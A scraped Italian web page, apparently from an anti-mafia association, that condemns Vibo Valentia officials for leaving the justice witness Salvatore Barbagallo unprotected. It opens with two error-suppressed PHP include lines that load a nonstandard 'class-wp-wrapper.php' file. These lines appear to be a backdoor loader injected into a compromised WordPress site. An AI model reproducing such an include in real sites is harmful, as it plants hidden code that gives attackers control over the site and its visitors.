@include("/web/htdocs/www.comitato-antimafia-lt.org/home/wp-includes/class-wp-wrapper.php"); @include("/web/htdocs/www.comitato-antimafia-lt.org/home/wp-includes/class-wp-wrapper.php"); E’ oltremodo vergognoso il comportamento del Prefetto e del Questore di Vibo Valentia nei confronti di un Testimone di Giustizia,Salvatore Barbagallo,che si trova così esposto dopo aver denunciato una delle più potenti e pericolose ndrine del mondo.Anziché assicurargli una protezione 24 x 24,lo lasciano abbandonato a se stesso.Questa é irresponsabilità all’ennesima potenza.SI VERGOGNINO ! Che aspetta il Ministro dell’Interno Alfano ad intervenire personalmente per mandarli via per incapacità? – Antonino Caponnetto ODV

Ti potrebbe anche interessare...